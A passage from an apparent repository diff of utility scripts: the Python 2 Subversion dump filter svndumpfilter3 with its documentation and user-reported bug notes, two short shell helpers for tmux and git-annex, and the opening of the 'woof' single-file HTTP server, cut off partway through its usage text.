an empty file on a large repository. It worked great for the split that I
had to do on my repository, but I have no time to fix the problem that occurs
for some other people's repositories (I really, really do not have the time
to work on this). If you find the glitch, please send me a patch. I think
the problem is likely to be a minor one. If you need this for your business
and you're willing to pay hourly rates, I might be able to find someone to
work on it (perhaps me (http://furius.ca/home/consulting.html), depending on
schedule).
The list of <path> paths are the paths to filter in the repository. You pipe
the dumpfile through stdin. If you want to untangle the copy operations, you
need a live repository and to use --untangle=REPOS_PATH. Like this::
cat dumpfile | svndumpfilter3 --untangle=/my/svnroot project1 project2
The paths can include wildcards, and can consist of multiple parts, like::
cat dumpfile | svndumpfilter3 tags/proj.*/subproj trunk/subproj
Each component of the path is separated and matched separately (hence the above
would match for instance tags/proj-1.2/subproj but not tags/proj-1.2/a/subproj).
.. note::
This script's interface is only slightly different than Subversion's
svndumpfilter, it does not take subcommands; its default behaviour is that
of the 'include' subcommand of svndumpfilter. If you need 'exclude'
behaviour, just invoke it with the --exclude option.
This is useful if you want to split a repository for which files have been
copied or moved between filtered and non-filtered locations. The resulting dump
would be illegal if we just ignored these, because Subversion records the
copy/move operations only.
Chapter 5 of the Subversion book hints about this; for more details about the problem, see there:
Also, copied paths can give you some trouble. Subversion supports
copy operations in the repository, where a new path is created by
copying some already existing path. It is possible that at some
point in the lifetime of your repository, you might have copied a
file or directory from some location that svndumpfilter is
excluding, to a location that it is including. In order to make
the dump data self-sufficient, svndumpfilter needs to still show
the addition of the new path including the contents of any files
created by the copy, and not represent that addition as a copy from
a source that won't exist in your filtered dump data stream. But
because the Subversion repository dump format only shows what was
changed in each revision, the contents of the copy source might
not be readily available. If you suspect that you have any copies
of this sort in your repository, you might want to rethink your
set of included/excluded paths.
Future Work
-----------
* We still need to implement the per-subcommand options of svndumpfilter. Feel
free to do so if you need it, or contact Martin Blais for subcontracting (I
will do this for money, right now I have no time).
Credits
-------
This code is originally based on Simon Tatham's svndumpfilter2, but we
significantly changed the main loop and are using 'svnadmin dump' to fetch old
revisions rather than working recursively with 'svnlook cat'. The problem I was
having was that svndumpfilter2 was running out of memory so I had to rewrite it.
svndumpfilter2 tracks all files itself in order to replicate the required
revisions, and it uses ``svnlook cat`` to fetch them, which is fast. This
consumes a lot of memory (I could not run it on a 126MB repository with 2800
revisions on my P4 1GB RAM server). svndumpfilter3 does not track the revisions
itself, instead it uses ``svnadmin dump`` with the original svndumpfilter to
produce the necessary lumps to insert them in the output. This operation is
much slower, but it does not matter if you have relatively few move/copy
operations between excluded directories, which I think is by far the common case
for multiple project roots (it was my case).
[2009-01-08] A bugfix patch was provided by Jamie Townsend <jtownsen at
progress dot com>.
[2009-04-05] Minor path matching improvements by Matthias Troffaes <matthias
dot troffaes at gmail dot com>
Important Note
--------------
I cannot guarantee anything about your data (see the legal terms above). If you
lose data by using this program, THAT IS YOUR OWN PROBLEM. Do not forget to
MAKE BACKUPS in case something goes wrong. This is your own responsibility.
Always make backups.
[2009-09-18]
Here is a note from a user about a potential problem with the preservation of
properties, with the >100 hr/week workload, I have no time to look into it at
the moment:
From "Földvári György"
To blais@furius.ca
Subject Critical bug in svndumpfilter3?
Hello Martin,
First of all, your tool helped me a lot in my task. But I think I have
found a critical bug in svndumpfilter3 which can cause loss of
revisioned properties. Please check it and distribute a fix if you have
time.
I experienced that some files and folders lost their revisioned
properties after being filtered by svndumpfilter3. It was not some of
the properties, but all of them, and at first I found no pattern.
By comparing the input and output dumps I realized that the
problem occurs with files/folders which have modifications committed.
The root cause is that if a modification does not touch the properties,
the lump of that change will not contain a properties section at all, but
svndumpfilter3 will add an empty one anyway. But this empty properties
section means that the properties have been modified, and after the
modification there are no properties anymore.
I propose something like this: during the read of a lump, check whether a
properties section was read at all, and use this info to decide whether one
should be written.
"""
## FIXME: TODO, incorporate change from Barry Warsaw:
##
## I did make one small change though. InterestingPaths.interesting()
## seems more useful to me just doing a straight up regexp match instead
## of trying to split the path and matching against the first
## component. I'm not quite sure how useful the default behavior would
## be actually. So I made a change to something like this:
##
## for r in self.res:
## if r.match(path):
## r = True
## break
## else:
## r = False
## ...
##
## So I could do something like
##
## ... | svndumpfilter3 --exclude /staging/.* > ...
##
## or more complicated regexps. Anyway, again thanks and hope all is well.
##
## --Barry
##
## A note about locale From Doug Hunley
## ------------------------------------
##
## I've been seeing the issue w/ svndumpfilter3 where the dump that is
## created contains all the relevant revisions but no actual data. In my
## case, it turns out that doing:
## export LC_CTYPE=en_US.UTF-8
## and /then/ running svndumpfilter3 worked.
##
## When I tried to check out a copy of the repo I was using to
## 'untangle' things I found that the checkout failed with an error about
## being unable to convert string to native encoding, which when googled,
## led me to a page saying to set the above. Doing so let me check out
## the repo in question, so I then re-ran svndumpfilter and got a usable
## dump file.
##
## --Doug
__author__ = 'Martin Blais <blais@furius.ca>'
__author_orig__ = 'Simon Tatham (svndumpfilter2)'
__contributors__ = ('Martin Blais <blais@furius.ca>',
'Matthias Troffaes <matthias.troffaes@gmail.com>',)
import sys
if sys.version_info[:2] < (2, 4):
raise SystemExit("Error: You need Python 2.4 or over.")
# stdlib imports
import os, re, string, md5, warnings
from os.path import basename
from subprocess import Popen, PIPE
# Constants for versions.
# Note: v3 does not really exist, see this for details:
# http://svn.haxx.se/dev/archive-2004-11/1111.shtml
__supported_versions__ = ('2', '3')
fmtequiv = {'1': 1,
'2': 2,
'3': 2}
format_warning = False
# Note
# ----
# We expect to be reading a valid SVN dump file output by SVN
# itself, so I currently feel no particular obligation to do
# user-friendly error reporting. Assertion failures or Python
# exceptions are perfectly adequate, since errors should only show
# up during development of this script.
# The sensible way to deal with a pathname is to split it into pieces at the
# slashes and thereafter treat it as a list. The following functions provide
# that functionality.
# Note: from Simon Tatham.
def splitpath(s):
"""
Split a string path into a path-as-list (a list of its components).
"""
thelist = string.split(s, "/")
# Simplest way to remove all empty elements!
try:
while 1:
thelist.remove("")
except ValueError:
pass
return thelist
def joinpath(thelist, prefix=""):
"""
Convert a path-as-list into a string.
"""
return prefix + string.join(thelist, "/")
def catpath(path1, path2, prefix=""):
"""
Concatenate two paths, return a path as a string.
"""
return joinpath(splitpath(path1) + splitpath(path2), prefix)
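# Same path helpers as in svndumpfilter2; for example (assumed):
#   catpath("tags", "proj/sub", "/") -> "/tags/proj/sub"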
# Note: from Simon Tatham.
class InterestingPaths:
"""
Decide whether a pathname is interesting or not.
"""
def __init__(self, args, reverse):
self.reverse = reverse
"""True if we should reverse the matches, e.g. true means exclude on the
list of paths rather than include."""
self.res = []
for a in args:
self.res.append([])
for component in splitpath(a):
self.res[-1].append(re.compile(component))
"""List of regular expressions to match against/exclude."""
def interesting(self, path):
"""
Return true if this path is considered included.
"""
match = False
acomps = splitpath(path)
assert len(acomps) > 0
for rcomps in self.res:
# if rcomps has more components than acomps
# then we cannot have a match, so skip this case
if len(rcomps) > len(acomps):
continue
# see if rcomps matches acomps
for r, a in zip(rcomps, acomps):
if not r.match(a):
break
else:
# everything matches
match = True
break
if self.reverse:
match = not match
return match
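# Per-component matching in action (a sketch): with
#   paths = InterestingPaths(["tags/proj.*/subproj"], False)
# paths.interesting("tags/proj-1.2/subproj") is True, while
# paths.interesting("tags/proj-1.2/a/subproj") is False, because the
# component "a" fails the "subproj" pattern.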
# Note: from Simon Tatham.
class Lump:
"""
A class and some functions to handle a single lump of
RFC822-ish-headers-plus-data read from an SVN dump file.
"""
def __init__(self):
self.hdrlist = []
self.hdrdict = {}
self.prop = ""
self.text = ""
self.proplist = []
self.propdict = {}
def sethdr(self, key, val):
"""
Set header 'key' to 'val'.
"""
if not self.hdrdict.has_key(key):
self.hdrlist.append(key)
self.hdrdict[key] = val
def delhdr(self, key):
"""
Delete the header 'key'.
"""
if self.hdrdict.has_key(key):
del self.hdrdict[key]
self.hdrlist.remove(key)
def propparse(self):
"""
Parse the properties of the lump.
"""
index = 0
while 1:
if self.prop[index:index+2] == "K ":
wantval = 1
elif self.prop[index:index+2] == "D ":
wantval = 0
elif self.prop[index:index+9] == "PROPS-END":
break
else:
raise "Unrecognised record in props section"
nlpos = string.find(self.prop, "\n", index)
assert nlpos > 0
namelen = string.atoi(self.prop[index+2:nlpos])
assert self.prop[nlpos+1+namelen] == "\n"
name = self.prop[nlpos+1:nlpos+1+namelen]
index = nlpos+2+namelen
if wantval:
assert self.prop[index:index+2] == "V "
nlpos = string.find(self.prop, "\n", index)
assert nlpos > 0
proplen = string.atoi(self.prop[index+2:nlpos])
assert self.prop[nlpos+1+proplen] == "\n"
prop = self.prop[nlpos+1:nlpos+1+proplen]
index = nlpos+2+proplen
else:
prop = None
self.proplist.append(name)
self.propdict[name] = prop
def setprop(self, key, val):
"""
Set property 'key' to 'val'.
"""
if not self.propdict.has_key(key):
self.proplist.append(key)
self.propdict[key] = val
def delprop(self, key):
"""
Delete property 'key'.
"""
if self.propdict.has_key(key):
del self.propdict[key]
self.proplist.remove(key)
def correct_headers(self):
"""
Adjust the headers, from updated contents.
"""
# First reconstitute the properties block.
self.prop = ""
# JT if there's a delete of something that got added in the same transaction
# (ie, it was added and then renamed), there must be no properties created for it
#if not opts.prune_properties or len(self.proplist) > 0:
if (not opts.prune_properties or len(self.proplist) > 0) and self.hdrdict.get('Node-action') != "delete":
for key in self.proplist:
val = self.propdict[key]
if val is None:
self.prop += "D %d\n%s\n" % (len(key), key)
else:
self.prop += "K %d\n%s\n" % (len(key), key)
self.prop += "V %d\n%s\n" % (len(val), val)
self.prop = self.prop + "PROPS-END\n"
# Now fix up the content length headers.
if len(self.prop) > 0:
self.sethdr("Prop-content-length", str(len(self.prop)))
else:
self.delhdr("Prop-content-length")
if len(self.text) > 0 or \
(self.hdrdict.get('Node-action', None) == 'add' and
self.hdrdict.get('Node-kind', None) == 'file' and
not self.hdrdict.get('Node-copyfrom-path', None)):
self.sethdr("Text-content-length", str(len(self.text)))
m = md5.new()
m.update(self.text)
self.sethdr("Text-content-md5", m.hexdigest())
else:
self.delhdr("Text-content-length")
self.delhdr("Text-content-md5")
if len(self.prop) > 0 or len(self.text) > 0:
self.sethdr("Content-length", str(len(self.prop)+len(self.text)))
else:
self.delhdr("Content-length")
format_re = re.compile('SVN-fs-dump-format-version: (\d+)\s*$')
uuid_re = re.compile('UUID: ([0-9a-f\-]+)\s*$')
def read_dump_header(f):
"""
Match and read a dumpfile's header and return the format version and the file's
UUID.
"""
mo_version = format_re.match(f.readline())
assert mo_version
f.readline()
mo_uuid = uuid_re.match(f.readline())
assert mo_uuid
f.readline()
text = '%s\n%s\n' % (mo_version.string, mo_uuid.string)
return mo_version.group(1), mo_uuid.group(1), text
header_re = re.compile('([a-zA-Z0-9\-]+): (.*)$')
# Note: from Simon Tatham.
def read_rfc822_headers(f):
"""
Read a set of RFC822 headers from the given file. We return a dict and the
set of original lines that were parsed to obtain the contents.
"""
ret = Lump()
lines = []
while 1:
s = f.readline()
if not s:
return None, [] # end of file
# Watch for the newline char that ends the headers.
if s == '\n':
if len(ret.hdrlist) > 0:
break # newline after headers ends them
else:
continue # newline before headers is simply ignored
lines.append(s)
mo = header_re.match(s)
if mo is None:
raise SystemExit("Error: Parsing header: %s" % s)
ret.sethdr(*mo.groups())
return ret, lines
# Note: from Simon Tatham.
def read_lump(f):
"""
Read a single lump from the given file.
Note: there is a single empty line that is used to conclude the RFC headers,
and it is not part of the rest. Then you have the properties, which are of
exactly the property length, and right away follows the contents of exactly
the length of the content length. Then follows two newline characters and
then the next lump starts.
"""
lump, lines = read_rfc822_headers(f)
if lump is None:
return None
pcl = int(lump.hdrdict.get("Prop-content-length", "0"))
tcl = int(lump.hdrdict.get("Text-content-length", "0"))
if pcl > 0:
lump.prop = f.read(pcl)
lump.propparse()
if tcl > 0:
lump.text = f.read(tcl)
lump.orig_text = os.linesep.join(lines) + lump.prop + lump.text
return lump
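# Byte layout of a lump, as described in the docstring (sketch):
#   <RFC822-ish headers, one per line>
#   <single blank line ending the headers>
#   <exactly Prop-content-length bytes of properties>
#   <exactly Text-content-length bytes of text>
#   <two newline characters before the next lump>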
def write_lump(f, lump):
"""
Write a single lump to the given file.
"""
# Make sure that the lengths are adjusted appropriately.
lump.correct_headers()
for key in lump.hdrlist:
val = lump.hdrdict[key]
f.write(key + ": " + val + "\n")
f.write("\n")
# Render the payload.
f.write(lump.prop)
f.write(lump.text)
# Add newlines at the end of chunks, for readers.
f.write('\n')
if not lump.hdrdict.has_key("Revision-number"):
f.write('\n')
def fetch_rev_rename(repos, srcrev, srcpath, path, fout, flog, format):
"""
Dumps 'srcpath' at revision 'srcrev' from repository 'repos',
renaming the root of all the paths in it to 'path', and
outputting the lumps in 'fout' (without the header and revision
lump).
"""
assert isinstance(srcrev, int)
# Must find the source node, as it existed in the given revision, and copy
# it in full.
cmd = ('svnadmin', 'dump', '-r', str(srcrev),
opts.repos, srcpath)
cmd_filter = ('svndumpfilter', 'include', srcpath)
if opts.debug:
print >> flog, ("Running command: '%s | %s'" %
(' '.join(cmd), ' '.join(cmd_filter)))
fnull = open('/dev/null', 'w')
p1 = Popen(cmd, stdout=PIPE, stderr=fnull)
p2 = Popen(cmd_filter, stdin=p1.stdout,
stdout=PIPE, stderr=fnull)
fs = p2.stdout
#
# Process the subdump.
#
# Read and drop dump header.
format_sub, uuid_sub, text_sub = read_dump_header(fs)
global format_warning
if fmtequiv[format] != fmtequiv[format_sub] and not format_warning:
warnings.warn("Warning: Dump format is different than "
"the version of Subversion used to convert "
"move/copy into adds.")
format_warning = True
# Read and drop the revision lump.
lump_sub = read_lump(fs)
assert lump_sub is not None
assert lump_sub.hdrdict.has_key('Revision-number')
while 1:
# Read one lump at a time
lump_sub = read_lump(fs)
if lump_sub is None:
break # At EOF
# Make sure all the rest are file/dir lumps.
assert not lump_sub.hdrdict.has_key('Revision-number')
# Translate filename to its new location.
path_sub = lump_sub.hdrdict['Node-path']
assert path_sub.startswith(srcpath)
path_sub_new = path + path_sub[len(srcpath):]
lump_sub.sethdr('Node-path', path_sub_new)
print >> flog, ("%s: Converted '%s' to '%s'" %
(progname, path_sub, path_sub_new))
if path_sub_new == path:
print >> flog, ("%s: Marked '%s' as untangled." %
(progname, path))
lines = ("Node-copyfrom-path: %s" % srcpath,
"Node-copyfrom-rev: %d" % srcrev)
lump_sub.setprop('svn:untangled', os.linesep.join(lines))
write_lump(fout, lump_sub)
p2.wait()
if p2.returncode != 0:
raise SystemExit("Error: Running %s" % cmd)
def parse_options():
"""
Parse and validate the options.
"""
global progname
progname = basename(sys.argv[0])
import optparse
parser = optparse.OptionParser(__doc__.strip())
# Original svndumpfilter options.
#
# FIXME: we still need to implement these 3 options.
#
# FIXME: we could convert this script to use subcommands and add the same
# subcommand options that are present in svndumpfilter.
parser.add_option('--drop-empty-revs', action='store_true',
help="Remove revisions emptied by filtering.")
parser.add_option('--renumber-revs', action='store_true',
help="Renumber revisions left after filtering.")
parser.add_option('--preserve-revprops', action='store_true',
help="Don't filter revision properties.")
parser.add_option('--quiet', action='store_true',
help="Do not display filtering statistics.")
parser.add_option('-e', '--exclude', action='store_true',
help="The given paths are to be excluded rather than "
"included (the default is to include).")
parser.add_option('-p', '--prune-properties', action='store_true',
help="Prune empty properties if empty. This makes the "
"dump file smaller, but does not match latest "
"version of svnadmin dump, so don't use if e.g. "
"you want to diff the input and output dump.")
parser.add_option('-u', '--untangle', action='store', dest='repos',
metavar='REPOS_PATH',
help="If True, convert move/copy from filtered paths "
"to additions. You need to specify the repository to "
"fetch the missing files from.")
parser.add_option('-n', '--no-filter', action='store_true',
help="Do not actually apply filters, but just "
"perform the requested conversions. This can be used "
"as a test by running the output into svndumpfilter, "
"which should now succeed.")
parser.add_option('-k', '--ignore-missing', action='store_true',
help="Continue as much as possible after an error due to "
"a missing file. If such errors are present, the "
"resulting noutput dump may not be usable (files will be "
"missing. The original svndumpfilter actually exits "
"when this occurs (this is our default behaviour as "
"well). You can use this to view the list of files "
"that are missing by using the specified filter.")
parser.add_option("--filter-contents", type="string", nargs=3, default=[],
action="append", metavar="RX_FILES RX_MATCH SUB",
help="Apply a regular expression substitution (filter) "
"to the contents of a certain set of files. This "
"option needs three arguments (separated by "
"spaces): a regular expression that specifies the "
"files to be processed (eg: \"*.[ch]\"); the regexp "
"that matches the text; the replacement regexp. You "
"can specify this option as many times as you need.")
parser.add_option("--filter-logs", type="string", nargs=2, default=[],
action="append", metavar="RX_MATCH SUB",
help="Apply a regular expression substitution (filter) "
"to the commit log messages. This "
"option needs two arguments (separated by "
"spaces): the regexp "
"that matches the text; the replacement regexp. You "
"can specify this option as many times as you need.")
parser.add_option("--skip-rev", type="int", action="append", default=[],
metavar="REV",
help="Skip (filter out) a specific revision. You can "
"specify this option as many times as you need.")
parser.add_option('--debug', action='store_true',
help=optparse.SUPPRESS_HELP)
global opts
opts, args = parser.parse_args()
# Args can be empty. In that case, we will not do any path-based filtering
# (= all paths are included).
inpaths = args
# Validate filter regular expressions
try:
opts.filter_contents = [(re.compile(a), re.compile(b), c)
for a,b,c in opts.filter_contents]
opts.filter_logs = [(re.compile(a), b)
for a,b in opts.filter_logs]
except Exception, e:
parser.error("error parsing regular expression: %s" % str(e))
if opts.no_filter and not opts.repos:
parser.error("Both filtering and untangle are disabled. "
"This filter will have no effect.")
if opts.repos and opts.ignore_missing:
parser.error("You don't need --ignore-missing if you're untangling.")
opts.skip_rev = set(opts.skip_rev)
for optname in 'drop-empty-revs', 'renumber-revs', 'preserve-revprops':
if getattr(opts, optname.replace('-', '_')):
parser.error("(Option '%s' not implemented)." % optname)
return opts, inpaths
def main():
"""
Main program that just reads the lumps and copies them out.
"""
opts, inpaths = parse_options()
# Open in and out files.
fr = sys.stdin
fw = sys.stdout
flog = sys.stderr
# Track which base files are interesting, accepting regexps for input
# filenames.
if opts.exclude:
print >> flog, 'Excluding prefixes:'
else:
print >> flog, 'Including prefixes:'
for p in inpaths:
print >> flog, " '/%s'" % p
print >> flog
if not inpaths:
opts.exclude = True
paths = InterestingPaths(inpaths, opts.exclude)
# Read the dumpfile header.
format, uuid, text = read_dump_header(fr)
fw.write(text)
if format not in __supported_versions__:
# Note: you could update this script easily to support other formats, it
# will probably be trivial to do so.
raise SystemExit("Error: dump file in format '%s' not supported." %
format)
filtered = set()
"""Set of filtered paths."""
converted = []
"""List of (srcpath, destpath, type, rev) tuples that describe the paths
that were converted from move/copy into additions."""
skipping = False
"""True while we are skipping a revision."""
# Process the dump file.
while 1:
# Read one lump at a time
lump = read_lump(fr)
if lump is None:
break # At EOF
# Let the revisions pass through
if lump.hdrdict.has_key('Revision-number'):
revno = lump.hdrdict['Revision-number']
if int(revno) in opts.skip_rev:
print >> flog, 'Revision %s filtered out.' % revno
skipping = True
continue
skipping = False
# Filter svn:log property
# JT Revision 0 may not have an svn:log entry, so we need to accommodate that
# (added if condition)
if lump.propdict.has_key('svn:log'):
log = lump.propdict["svn:log"]
num_subs = 0
for rx_search, sub in opts.filter_logs:
lump.propdict["svn:log"], subs = re.subn(rx_search, sub, lump.propdict["svn:log"])
num_subs += subs
if num_subs:
print >> flog, "log filtered: %d times" % num_subs
lump.correct_headers()
write_lump(fw, lump)
if not opts.quiet:
print >> flog, 'Revision %s committed as %s.' % (revno, revno)
continue
# If we're skipping this revision, go to the next lump
if skipping:
continue
# Print some kind of progress information.
if opts.debug:
d = lump.hdrdict
print >> flog, (
' %-10s %-10s %s' %
(d.get('Node-kind', ''), d['Node-action'], d['Node-path']))
# Filter out the uninteresting lumps
path = lump.hdrdict['Node-path']
if not paths.interesting(path):
filtered.add(path)
continue
# See if any of the provided filters match against this file
num_subs = 0
for rx_file, rx_search, sub in opts.filter_contents:
if rx_file.search(path):
lump.text, subs = re.subn(rx_search, sub, lump.text)
num_subs += subs
if num_subs:
print >> flog, "contents filtered: %d times" % num_subs
lump.correct_headers()
# If this is not a move/copy.
if not lump.hdrdict.has_key("Node-copyfrom-path"):
# Just pass through.
write_lump(fw, lump)
else:
# This is a move/copy.
srcrev = int(lump.hdrdict["Node-copyfrom-rev"])
srcpath = lump.hdrdict["Node-copyfrom-path"]
# Check if the copy's source comes from a filtered path.
if paths.interesting(srcpath):
# If it comes from an included path, just pass through.
write_lump(fw, lump)
else:
# Otherwise we deal with the case where the source comes from a
# filtered path.
if not opts.repos:
msg = ("%s: Invalid copy source path '%s'" %
(progname, srcpath))
if opts.ignore_missing:
print >> flog, msg
continue
else:
raise SystemExit(msg)
converted.append(
(srcpath, path, lump.hdrdict['Node-kind'], srcrev))
print >> flog, ("%s: Converting '%s' to a copy on '%s'" %
(progname, srcpath, path))
# Fetch the old revision from the repository.
fetch_rev_rename(opts.repos, srcrev, srcpath, path,
fw, flog, format)
# We also check if the original lump includes a payload, and if
# it does, we need to add a change record providing the new
# contents.
if len(lump.text) > 0 and paths.interesting(path):
assert False ## FIXME: remove
print >> flog, ("%s: Added a change record for '%s' as "
"well.") % (progname, path)
lump.sethdr("Node-action", "change")
lump.delhdr("Node-copyfrom-rev")
lump.delhdr("Node-copyfrom-path")
write_lump(fw, lump)
fr.close()
fw.close()
if not opts.quiet:
# Print summary of dropped nodes.
print >> flog, 'Dropped %d node(s):' % len(filtered)
for path in sorted(filtered):
print >> flog, " '/%s'" % path
print >> flog
# Print summary of converted nodes.
print >> flog, '%s node(s) converted into addition(s).' % len(converted)
for srcpath, dstpath, typ, srcrev in sorted(converted):
print >> flog, (" '/%s' to '/%s' (%s, revision %s)" %
(srcpath, dstpath, typ, srcrev))
print >> flog
if __name__ == '__main__':
main()

5
tmux_rattach.sh Executable file
View File

@ -0,0 +1,5 @@
#!/bin/sh
# Create or attach a tmux session
export TERM="xterm-256color"
tmux attach || tmux new

11
watch_annex.sh Executable file
View File

@ -0,0 +1,11 @@
#!/bin/sh
# Local git-annex directories to watch; set ANNEXES first, e.g.:
#ANNEXES="$HOME/documents $HOME/e-books $HOME/images $HOME/videos"
for annex in $ANNEXES; do
cd "$annex"
if [ $? -eq 0 ]; then
git annex watch
fi
done

429
woof Executable file
View File

@ -0,0 +1,429 @@
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# woof -- an ad-hoc single file webserver
# Copyright (C) 2004-2009 Simon Budig <simon@budig.de>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of the GNU General Public License is available at
# http://www.fsf.org/licenses/gpl.txt, you can also write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
# Darwin support with the help from Mat Caughron, <mat@phpconsulting.com>
# Solaris support by Colin Marquardt, <colin.marquardt@zmd.de>
# FreeBSD support with the help from Andy Gimblett, <A.M.Gimblett@swansea.ac.uk>
# Cygwin support by Stefan Reichör <stefan@xsteve.at>
# tarfile usage suggested by Morgan Lefieux <comete@geekandfree.org>
import sys, os, socket, getopt, commands
import urllib, BaseHTTPServer
import ConfigParser
import shutil, tarfile, zipfile
import struct
maxdownloads = 1
TM = object
cpid = -1
compressed = 'gz'
class EvilZipStreamWrapper(TM):
def __init__ (self, victim):
self.victim_fd = victim
self.position = 0
self.tells = []
self.in_file_data = 0
def tell (self):
self.tells.append (self.position)
return self.position
def seek (self, offset, whence = 0):
if offset != 0:
if offset == self.tells[0] + 14:
# the zipfile module tries to fix up the file header.
# write Data descriptor header instead,
# the next write from zipfile
# is CRC, compressed_size and file_size (as required)
self.write ("PK\007\010")
elif offset == self.tells[1]:
# the zipfile module goes to the end of the file. The next
# data written definitely is infrastructure (in_file_data = 0)
self.tells = []
self.in_file_data = 0
else:
raise "unexpected seek for EvilZipStreamWrapper"
def write (self, data):
# only test for headers if we know that we're not writing
# (potentially compressed) data.
if self.in_file_data == 0:
if data[:4] == zipfile.stringFileHeader:
# fix the file header for extra Data descriptor
hdr = list (struct.unpack (zipfile.structFileHeader, data[:30]))
hdr[3] |= (1 << 3)
data = struct.pack (zipfile.structFileHeader, *hdr) + data[30:]
self.in_file_data = 1
elif data[:4] == zipfile.stringCentralDir:
# fix the directory entry to match file header.
hdr = list (struct.unpack (zipfile.structCentralDir, data[:46]))
hdr[5] |= (1 << 3)
data = struct.pack (zipfile.structCentralDir, *hdr) + data[46:]
self.position += len (data)
self.victim_fd.write (data)
def __getattr__ (self, name):
return getattr (self.victim_fd, name)
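# Background on the trick above, to the best of my understanding of the
# ZIP format: setting bit 3 of the general-purpose flag announces that
# CRC and sizes follow the file data in a data descriptor record (the
# "PK\007\010" written in seek()), which is what makes it possible to
# stream a ZIP to a non-seekable destination such as this HTTP response.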
# Utility function to guess the IP (as a string) where the server can be
# reached from the outside. Quite nasty problem actually.
def find_ip ():
if sys.platform == "cygwin":
ipcfg = os.popen("ipconfig").readlines()
for l in ipcfg:
try:
candidat = l.split(":")[1].strip()
if candidat[0].isdigit():
break
except:
pass
return candidat
os.environ["PATH"] = "/sbin:/usr/sbin:/usr/local/sbin:" + os.environ["PATH"]
platform = os.uname()[0];
if platform == "Linux":
netstat = commands.getoutput ("LC_MESSAGES=C netstat -rn")
defiface = [i.split ()[-1] for i in netstat.split ('\n')
if i.split ()[0] == "0.0.0.0"]
elif platform in ("Darwin", "FreeBSD", "NetBSD"):
netstat = commands.getoutput ("LC_MESSAGES=C netstat -rn")
defiface = [i.split ()[-1] for i in netstat.split ('\n')
if len(i) > 2 and i.split ()[0] == "default"]
elif platform == "SunOS":
netstat = commands.getoutput ("LC_MESSAGES=C netstat -arn")
defiface = [i.split ()[-1] for i in netstat.split ('\n')
if len(i) > 2 and i.split ()[0] == "0.0.0.0"]
else:
print >>sys.stderr, "Unsupported platform; please add support for your platform in find_ip().";
return None
if not defiface:
return None
if platform == "Linux":
ifcfg = commands.getoutput ("LC_MESSAGES=C ifconfig "
+ defiface[0]).split ("inet addr:")
elif platform in ("Darwin", "FreeBSD", "SunOS", "NetBSD"):
ifcfg = commands.getoutput ("LC_MESSAGES=C ifconfig "
+ defiface[0]).split ("inet ")
if len (ifcfg) != 2:
return None
ip_addr = ifcfg[1].split ()[0]
# sanity check
try:
ints = [ i for i in ip_addr.split (".") if 0 <= int(i) <= 255]
if len (ints) != 4:
return None
except ValueError:
return None
return ip_addr
# Main class implementing an HTTP-Requesthandler, that serves just a single
# file and redirects all other requests to this file (this passes the actual
# filename to the client).
# Currently it is impossible to serve different files with different
# instances of this class.
class FileServHTTPRequestHandler (BaseHTTPServer.BaseHTTPRequestHandler):
server_version = "Simons FileServer"
protocol_version = "HTTP/1.0"
filename = "."
def log_request (self, code='-', size='-'):
if code == 200:
BaseHTTPServer.BaseHTTPRequestHandler.log_request (self, code, size)
def do_GET (self):
global maxdownloads, cpid, compressed
# Redirect any request to the filename of the file to serve.
# This hands over the filename to the client.
self.path = urllib.quote (urllib.unquote (self.path))
location = "/" + urllib.quote (os.path.basename (self.filename))
if os.path.isdir (self.filename):
if compressed == 'gz':
location += ".tar.gz"
elif compressed == 'bz2':
location += ".tar.bz2"
elif compressed == 'zip':
location += ".zip"
else:
location += ".tar"
if self.path != location:
txt = """\
<html>
<head><title>302 Found</title></head>
<body>302 Found <a href="%s">here</a>.</body>
</html>\n""" % location
self.send_response (302)
self.send_header ("Location", location)
self.send_header ("Content-type", "text/html")
self.send_header ("Content-Length", str (len (txt)))
self.end_headers ()
self.wfile.write (txt)
return
maxdownloads -= 1
# let a separate process handle the actual download, so that
# multiple downloads can happen simultaneously.
cpid = os.fork ()
if cpid == 0:
# Child process
child = None
type = None
if os.path.isfile (self.filename):
type = "file"
elif os.path.isdir (self.filename):
type = "dir"
if not type:
print >> sys.stderr, "can only serve files or directories. Aborting."
sys.exit (1)
self.send_response (200)
self.send_header ("Content-type", "application/octet-stream")
if os.path.isfile (self.filename):
self.send_header ("Content-Length",
os.path.getsize (self.filename))
self.end_headers ()
try:
if type == "file":
datafile = file (self.filename)
shutil.copyfileobj (datafile, self.wfile)
datafile.close ()
elif type == "dir":
if compressed == 'zip':
ezfile = EvilZipStreamWrapper (self.wfile)
zfile = zipfile.ZipFile (ezfile, 'w', zipfile.ZIP_DEFLATED)
stripoff = os.path.dirname (self.filename) + os.sep
for root, dirs, files in os.walk (self.filename):
for f in files:
filename = os.path.join (root, f)
if filename[:len (stripoff)] != stripoff:
raise RuntimeError, "invalid filename assumptions, please report!"
zfile.write (filename, filename[len (stripoff):])
zfile.close ()
else:
tfile = tarfile.open (mode=('w|' + compressed),
fileobj=self.wfile)
tfile.add (self.filename,
arcname=os.path.basename(self.filename))
tfile.close ()
except Exception, e:
print e
print >>sys.stderr, "Connection broke. Aborting"
def serve_files (filename, maxdown = 1, ip_addr = '', port = 8080):
global maxdownloads
maxdownloads = maxdown
# We have to somehow push the filename of the file to serve to the
# class handling the requests. This is an evil way to do this...
FileServHTTPRequestHandler.filename = filename
try:
httpd = BaseHTTPServer.HTTPServer ((ip_addr, port),
FileServHTTPRequestHandler)
except socket.error:
print >>sys.stderr, "cannot bind to IP address '%s' port %d" % (ip_addr, port)
sys.exit (1)
if not ip_addr:
ip_addr = find_ip ()
if ip_addr:
print "Now serving on http://%s:%s/" % (ip_addr, httpd.server_port)
while cpid != 0 and maxdownloads > 0:
httpd.handle_request ()
def usage (defport, defmaxdown, errmsg = None):
name = os.path.basename (sys.argv[0])
print >>sys.stderr, """
Usage: %s [-i <ip_addr>] [-p <port>] [-c <count>] <file>
%s [-i <ip_addr>] [-p <port>] [-c <count>] [-z|-j|-Z|-u] <dir>
%s [-i <ip_addr>] [-p <port>] [-c <count>] -s
Serves a single file <count> times via http on port <port> on IP
address <ip_addr>.
